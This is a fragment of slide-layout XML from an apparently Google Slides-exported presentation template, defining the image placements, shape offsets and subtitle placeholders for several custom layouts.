          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="520" name="Google Shape;520;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="521" name="Google Shape;521;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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ay)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="522" name="Shape 522"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p30"/>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25" name="Google Shape;525;p3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26" name="Google Shape;526;p3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28" name="Google Shape;528;p3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0" name="Google Shape;530;p30"/>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1" name="Google Shape;531;p30"/>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0"/>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0"/>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5" name="Google Shape;535;p30"/>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6" name="Google Shape;536;p30"/>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37" name="Google Shape;537;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="538" name="Google Shape;538;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="539" name="Google Shape;539;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="540" name="Google Shape;540;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>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27" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Google Shape;28;p4"/>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29" name="Google Shape;29;p4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="3807100"/>
            <a:ext cx="8596200" cy="106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31" name="Google Shape;31;p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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;32;p4"/>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3" name="Google Shape;33;p4"/>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4" name="Google Shape;34;p4"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Google Shape;35;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="678010" y="1152144"/>
            <a:ext cx="2286002" cy="1691641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Google Shape;36;p4"/>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Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="541" name="Shape 541"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Google Shape;542;p31"/>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4" name="Google Shape;544;p3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45" name="Google Shape;545;p3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47" name="Google Shape;547;p3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31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12225" y="1398000"/>
            <a:ext cx="91440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0" name="Google Shape;550;p31"/>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1"/>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1"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="22335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4" name="Google Shape;554;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076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55" name="Google Shape;555;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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56" name="Google Shape;556;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="557" name="Google Shape;557;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="Google Shape;558;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="559" name="Google Shape;559;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567"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5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="560" name="Shape 560"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p32"/>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3" name="Google Shape;563;p3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64" name="Google Shape;564;p3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66" name="Google Shape;566;p3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8" name="Google Shape;568;p32"/>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69" name="Google Shape;569;p32"/>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2"/>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2"/>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3" name="Google Shape;573;p32"/>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4" name="Google Shape;574;p32"/>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5" name="Google Shape;575;p32"/>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2"/>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77" name="Google Shape;577;p32"/>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578" name="Google Shape;578;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="579" name="Google Shape;579;p32"/>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580" name="Google Shape;580;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="581" name="Google Shape;581;p32"/>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5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="582" name="Shape 582"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p33"/>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85" name="Google Shape;585;p3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586" name="Google Shape;586;p3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587" name="Google Shape;587;p3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588" name="Google Shape;588;p3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589" name="Google Shape;589;p3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0" name="Google Shape;590;p33"/>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1" name="Google Shape;591;p33"/>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3"/>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3"/>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3"/>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5" name="Google Shape;595;p33"/>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6" name="Google Shape;596;p33"/>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7" name="Google Shape;597;p33"/>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3"/>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99" name="Google Shape;599;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="600" name="Google Shape;600;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="602" name="Google Shape;602;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="603" name="Google Shape;603;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>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ay)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="604" name="Shape 604"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p34"/>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7" name="Google Shape;607;p3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08" name="Google Shape;608;p3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09" name="Google Shape;609;p3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10" name="Google Shape;610;p3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11" name="Google Shape;611;p3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2" name="Google Shape;612;p34"/>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3" name="Google Shape;613;p34"/>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4"/>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4"/>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4"/>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7" name="Google Shape;617;p34"/>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8" name="Google Shape;618;p34"/>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9" name="Google Shape;619;p34"/>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4"/>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21" name="Google Shape;621;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="622" name="Google Shape;622;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="623" name="Google Shape;623;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="624" name="Google Shape;624;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774"/>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guide id="2" pos="1512">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Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="626" name="Shape 626"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1362456" y="1300238"/>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29" name="Google Shape;629;p3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30" name="Google Shape;630;p3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31" name="Google Shape;631;p3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2" name="Google Shape;632;p3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33" name="Google Shape;633;p3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4" name="Google Shape;634;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="131942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5" name="Google Shape;635;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="20025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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2692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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="33855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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="200495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39" name="Google Shape;639;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100" y="26952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0" name="Google Shape;640;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3385575"/>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1" name="Google Shape;641;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1364850" y="407830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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4078300"/>
            <a:ext cx="9168600" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="15544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43" name="Google Shape;643;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="644" name="Google Shape;644;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;645;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="646" name="Google Shape;646;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="647" name="Google Shape;647;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="475"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="4078298"/>
            <a:ext cx="785566" cy="6069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6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="648" name="Shape 648"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Google Shape;649;p36"/>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1" name="Google Shape;651;p3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52" name="Google Shape;652;p3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53" name="Google Shape;653;p3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54" name="Google Shape;654;p3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55" name="Google Shape;655;p3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6" name="Google Shape;656;p36"/>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7" name="Google Shape;657;p36"/>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6"/>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6"/>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6"/>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6"/>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6"/>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3" name="Google Shape;663;p36"/>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4" name="Google Shape;664;p36"/>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5" name="Google Shape;665;p36"/>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6" name="Google Shape;666;p36"/>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67" name="Google Shape;667;p36"/>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68" name="Google Shape;668;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
